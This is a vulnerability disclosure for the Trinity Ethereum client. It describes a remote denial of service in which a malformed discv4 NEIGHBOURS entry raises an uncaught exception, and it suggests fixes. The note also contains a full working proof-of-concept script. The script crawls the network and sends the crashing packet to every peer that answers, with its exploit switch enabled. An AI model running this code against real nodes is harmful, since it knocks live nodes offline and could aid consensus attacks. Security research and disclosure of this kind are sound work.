Ethereum 1.0 - Trinity - Neighbour of Death remote DoS via DiscV4

Vulnerability Note

1 Summary

Neighbours of Death - Remote Denial-of-Service via malformed DiscV4 Neighbours entries.

An attacker may send unsolicited discv4 neighbour responses to Trinity nodes, causing an uncaught exception that forces the node to shut down. This is a targeted one-shot attack. Being able to boot nodes off the network could be used to attack consensus (51%); however, the risk to the network is rather low, as the majority of nodes are non-Trinity nodes.

2 Details

2.1 Description

Uncaught Exception

The trinity-eth/p2p implementation of the discovery v4 protocol attempts to process received neighbour records using the ipaddress Python package. This package raises a ValueError if the received byte sequence does not decode to a valid IP address.

https://github.com/ethereum/trinity/blob/80463afcf9ea46a0a6b988ed54504d705cdf02e6/p2p/kademlia.py#L60

class Address(AddressAPI):

    def __init__(self, ip: str, udp_port: int, tcp_port: int) -> None:
        self.udp_port = udp_port
        self.tcp_port = tcp_port
        self._ip = ipaddress.ip_address(ip)
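
The failure is easy to reproduce in isolation; a minimal sketch, using the same 32-byte garbage value the PoC below sends as the "IP" field:

import ipaddress

# ip_address() accepts strings, integers, or packed 4/16-byte sequences;
# a 32-byte blob matches none of these and raises ValueError.
try:
    ipaddress.ip_address(b'\xff' * 32)
except ValueError as err:
    print(err)  # "... does not appear to be an IPv4 or IPv6 address"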

This exception is never caught.

https://github.com/ethereum/trinity/blob/80463afcf9ea46a0a6b988ed54504d705cdf02e6/p2p/discovery.py#L1252

@to_list
def _extract_nodes_from_payload(
        sender: AddressAPI,
        payload: List[Tuple[str, bytes, bytes, bytes]],
        logger: ExtendedDebugLogger) -> Iterator[NodeAPI]:
    for item in payload:
        ip, udp_port, tcp_port, node_id = item
        address = Address.from_endpoint(ip, udp_port, tcp_port)

https://github.com/ethereum/trinity/blob/80463afcf9ea46a0a6b988ed54504d705cdf02e6/p2p/discovery.py#L827

    async def recv_neighbours_v4(self, remote: NodeAPI, payload: Sequence[Any], _: Hash32) -> None:
        # The neighbours payload should have 2 elements: nodes, expiration
        if len(payload) < 2:
            self.logger.warning('Ignoring NEIGHBOURS msg with invalid payload: %s', payload)
            return
        nodes, expiration = payload[:2]
        if self._is_msg_expired(expiration):
            return
        neighbours = _extract_nodes_from_payload(remote.address, nodes, self.logger)
        self.logger.debug2('<<< neighbours from %s: %s', remote, neighbours)

An attacker who triggers this exception can therefore force the node to shut down.
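
A possible defensive fix - a minimal sketch, not necessarily the patch Trinity shipped - is to treat each neighbour entry in _extract_nodes_from_payload as untrusted input and drop entries that fail to parse instead of letting the exception propagate:

@to_list
def _extract_nodes_from_payload(
        sender: AddressAPI,
        payload: List[Tuple[str, bytes, bytes, bytes]],
        logger: ExtendedDebugLogger) -> Iterator[NodeAPI]:
    for item in payload:
        ip, udp_port, tcp_port, node_id = item
        try:
            address = Address.from_endpoint(ip, udp_port, tcp_port)
        except ValueError:
            # Malformed entry from an untrusted peer: skip it rather than
            # letting the exception propagate and kill the node.
            logger.warning("Ignoring neighbour with invalid address: %r", item)
            continue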

Processing unsolicited messages

Processing unsolicited neighbour messages (or unsolicited messages in general) is problematic and violates the spec. It opens up far more attack vectors: an attacker can force entries into the victim's routing table, keep the node busy exhausting resources, and potentially provoke outgoing traffic (pings, among others). This is very dangerous.
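
Per the discv4 spec, a neighbours packet is only valid as a reply to a findnode the node itself sent. A minimal sketch of such a guard - assuming the neighbours_channels registry referenced in the PoC below offers a per-peer already_waiting_for() check - could look like this:

    async def recv_neighbours_v4(self, remote: NodeAPI, payload: Sequence[Any], _: Hash32) -> None:
        # Drop unsolicited responses: only process NEIGHBOURS if we are
        # actually waiting for a reply from this peer.
        if not self.neighbours_channels.already_waiting_for(remote):
            self.logger.warning('Ignoring unsolicited NEIGHBOURS from %s', remote)
            return
        ...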

Note: There are likely more issues in this code, especially around DoS/replay protection.

2.2 Proof of Concept

PoC

  1. trinity starting up
  2. waiting a couple of seconds for it to initialize
  3. launching our PoC attack in a second window (not shown, but there’s not a lot of output anyway)
  4. (after a short wait) the PoC connects directly to the target (trinity) node via udp/discv4 and sends an unsolicited neighbours response containing a malformed neighbour entry.

Trinity does not check whether it actually sent a findnode request, so it goes belly up when processing the malformed neighbour and shuts down. Processing of unsolicited messages is not a requirement for the attack - it would also work otherwise - but this way we can immediately target nodes without first having to force them to send us a findnode request. Note: I can provide ready-to-go PoC Python code if you’re interested, but it is quite straightforward (and can easily be combined with a simple node-crawler script I wrote).

Here’s a screenshot of an invalid payload:

[screenshot: invalid payload]

Code

Add the target node to AttackDiscoveryService bootnodes and wait for it to send out messages.

from typing import (
    Iterable,
    List,
    Set,
    Tuple,
)
import trio
import async_service
from lahja import EndpointAPI
from eth.db.backends.memory import MemoryDB
from p2p.constants import (
    DISCOVERY_EVENTBUS_ENDPOINT,
)
from p2p.discovery import (
    PreferredNodeDiscoveryService,
    DiscoveryCommand,
    V4_HANDLER_TYPE,
    NodeAPI,
    NodeID,
    keccak, sort_by_distance, trio_utils, eth_utils, to_hex,
    constants,
    _get_msg_expiration,
    CMD_NEIGHBOURS, NeighboursPacket,
)

from p2p.node_db import NodeDB
from p2p.identity_schemes import default_identity_scheme_registry
from trinity.config import Eth1AppConfig
from trinity.extensibility import (
    TrioIsolatedComponent,
)

class AttackPeerDiscoveryComponent(TrioIsolatedComponent):
    """
    Continuously discover other Ethereum nodes.
    """
    name = "AttackDiscovery"
    endpoint_name = DISCOVERY_EVENTBUS_ENDPOINT

    @property
    def is_enabled(self) -> bool:
        return True

    async def do_run(self, event_bus: EndpointAPI) -> None:
        boot_info = self._boot_info
        config = boot_info.trinity_config
        config.port = 30888
        vm_config = config.get_app_config(Eth1AppConfig).get_chain_config().vm_configuration
        socket = trio.socket.socket(family=trio.socket.AF_INET, type=trio.socket.SOCK_DGRAM)
        await socket.bind(("0.0.0.0", config.port))
        base_db = MemoryDB()
        node_db = NodeDB(default_identity_scheme_registry, base_db)
        discovery_service = AttackDiscoveryService(
            config.nodekey,
            config.port,
            config.port,
            [  # target node(s); used instead of config.bootstrap_nodes
                enodeToMultiAddr("enode://a461d3765756c19eb42375c2f51a06b785dbb6197fe4f05484cd976112fa723ed6d876b8fc66a6ac5b654e38944244b13eb07ab441de708016647aee63c48c87@127.0.0.1:9000"),
                enodeToMultiAddr("enode://ffea312f26a0269408b9a636ba05f4322beaf41323539494e5a3d2fa9fd18cc33ba0b8588e4c4ec9ce10358c4d9f9ad06e133ff09c1f4808eec0860f486f0b27@0.0.0.0:30309"),
            ],
            config.preferred_nodes,
            event_bus,
            socket,
            node_db
        )
        await async_service.run_trio_service(discovery_service)

# Set to True to crawl only, without sending the malicious payload.
DISARM_EXPLOIT = False


class AttackDiscoveryService(PreferredNodeDiscoveryService):

    def _get_handler(self, cmd: DiscoveryCommand) -> V4_HANDLER_TYPE:
        print(cmd)
        return super()._get_handler(cmd)

    def send_neighbours_v4_of_death(self, node: NodeAPI, neighbours: Tuple[NodeAPI, ...] = ()) -> None:
        # A single malformed neighbour entry: the 32-byte garbage "IP" does not
        # decode as IPv4/IPv6, so the victim's ipaddress.ip_address() call
        # raises an uncaught ValueError and the node shuts down.
        nodes = [(b'\xff' * 32, b'\xff', b'\xff', b'\xff')]
        payload = NeighboursPacket(
            neighbours=nodes,
            expiration=_get_msg_expiration())
        self.send(node, CMD_NEIGHBOURS, payload)


    async def bootstrap(self) -> None:
        while True:
            bonding_queries = []
            for node in self.bootstrap_nodes:
                uri = node.uri()
                pubkey, _, uri_tail = uri.partition('@')
                pubkey_head = pubkey[:16]
                pubkey_tail = pubkey[-8:]
                self.logger.debug("full-bootnode: %s", uri)
                self.logger.debug("bootnode: %s...%s@%s", pubkey_head, pubkey_tail, uri_tail)
                self.invalidate_bond(node.id)

                bonding_queries.append((self.bond, node.id))

            bonded = await trio_utils.gather(*bonding_queries)
            successful_bonds = len([item for item in bonded if item is True])
            if not successful_bonds:
                self.logger.warning("Failed to bond with any bootstrap nodes %s", self.bootstrap_nodes)
                continue
            else:
                self.logger.info(
                    "Bonded with %d bootstrap nodes, performing initial lookup", successful_bonds)

            while True:
                await self.lookup_random()
                print("--------------- new bootstrap round")

    async def wait_neighbours(self, remote: NodeAPI) -> Tuple[NodeAPI, ...]:
        new_neighbors = await super().wait_neighbours(remote)
        # entries may contain duplicates
        print("received (", len(new_neighbors), ") *entries* (pot. dupes) neighbours from peer", remote)
        if not DISARM_EXPLOIT:
            print("SEND UNSOLICITED NEIGHBOURS of DEATH")
            self.send_neighbours_v4_of_death(remote)
        return new_neighbors

    async def _lookup(self, target_key: bytes) -> Tuple[NodeAPI, ...]:
        if len(target_key) != constants.KADEMLIA_PUBLIC_KEY_SIZE // 8:
            raise ValueError(f"Invalid lookup target ({target_key!r}). Length is not 64")
        target_id = NodeID(keccak(target_key))
        nodes_asked: Set[NodeAPI] = set()
        nodes_seen: Set[NodeAPI] = set()

        async def _find_node(target: bytes, remote: NodeAPI) -> Tuple[NodeAPI, ...]:
            self.send_find_node_v4(remote, target)
            # our wait_neighbours override fires the exploit as a side effect
            candidates = await self.wait_neighbours(remote)
            if not candidates:
                self.logger.debug("got no candidates from %s, returning", remote)
                return tuple()
            all_candidates = tuple(c for c in candidates if c not in nodes_seen)
            candidates = tuple(
                c for c in all_candidates
                if (not self.ping_channels.already_waiting_for(c) and
                    not self.pong_channels.already_waiting_for(c))
            )
            if not candidates:
                print("no new candidates, falling back to all received candidates")
                candidates = all_candidates
            print("received (", len(candidates), ") *new* from peer", remote) # most recently added node
            print("total:", len(list(self.iter_nodes())))
            self.logger.debug2("got %s new candidates", len(candidates))
            # Ensure all received candidates are in our DB so that we can bond with them.
            self._ensure_nodes_are_in_db(candidates)
            # Add new candidates to nodes_seen so that we don't attempt to bond with failing ones
            # in the future.
            nodes_seen.update(candidates)
            bonded = await trio_utils.gather(*((self.bond, c.id) for c in candidates))
            self.logger.debug2("bonded with %s candidates", bonded.count(True))
            return tuple(c for c, ok in zip(candidates, bonded) if ok)

        def _exclude_if_asked(nodes: Iterable[NodeAPI]) -> List[NodeAPI]:
            nodes_to_ask = list(set(nodes).difference(nodes_asked))
            return sort_by_distance(nodes_to_ask, target_id)[:constants.KADEMLIA_FIND_CONCURRENCY]

        closest = list(self.get_neighbours(target_id))
        self.logger.debug("starting lookup; initial neighbours: %s", closest)
        nodes_to_ask = _exclude_if_asked(closest)
        if not nodes_to_ask:
            self.logger.warning("No nodes found in routing table, can't perform lookup")
            return tuple()

        while nodes_to_ask:
            self.logger.debug2("node lookup; querying %s", nodes_to_ask)
            nodes_asked.update(nodes_to_ask)
            next_find_node_queries = (
                (_find_node, target_key, n)
                for n
                in nodes_to_ask
                if not self.neighbours_channels.already_waiting_for(n)
            )
            results = await trio_utils.gather(*next_find_node_queries)
            for candidates in results:
                closest.extend(candidates)
            # Need to sort again and pick just the closest k nodes to ensure we converge.
            closest = sort_by_distance(
                eth_utils.toolz.unique(closest), target_id)[:constants.KADEMLIA_BUCKET_SIZE]
            nodes_to_ask = _exclude_if_asked(closest)

        self.logger.debug(
            "lookup finished for target %s; closest neighbours: %s", to_hex(target_id), closest
        )
        return tuple(closest)

def main():
    import sys
    # override trinity defaults
    constants.KADEMLIA_FIND_CONCURRENCY = 1500 # basically, always ask up to 1500 in a loop
    constants.CONN_IDLE_TIMEOUT = 0.1
    constants.KADEMLIA_BUCKET_SIZE = 1024 * 8
    constants.NUM_ROUTING_TABLE_BUCKETS = 1024
    constants.KADEMLIA_IDLE_BUCKET_REFRESH_INTERVAL = 60*60*24*365 # keep 1 year?
    sys.modules["p2p.discovery.constants"] = constants
    from p2p import constants as p2p_constants
    p2p_constants.REPLY_TIMEOUT = 10
    p2p_constants.COMPLETION_TIMEOUT = 10
    p2p_constants.DEFAULT_MAX_PEERS = 10000
    p2p_constants.PEER_CONNECT_INTERVAL = 1
    p2p_constants.MAX_SEQUENTIAL_PEER_CONNECT = 10
    sys.modules["p2p.constants"] = p2p_constants # not sure if this hack really overwrite the import for other modules :thinking:
    from trinity.extensibility.component import run_trio_eth1_component
    run_trio_eth1_component(AttackPeerDiscoveryComponent)


def enodeToMultiAddr(_node):
    # Despite its name, this builds a p2p.kademlia.Node from an enode URI.
    import urllib.parse
    from eth_keys import keys
    from p2p.kademlia import Address, Node

    u = urllib.parse.urlparse(_node)
    pubkey = bytearray.fromhex(u.username)
    xpub = keys.PublicKey(pubkey)
    return Node.from_pubkey_and_addr(xpub, Address(u.hostname, u.port, u.port))

if __name__ == "__main__":
    main()

2.3 Timeline

AUG/17/2020 - contacted the Ethereum security team
SEP/03/2020 - confirmation received

3 References

This issue was submitted to the Ethereum 1.0 Bug Bounty Program.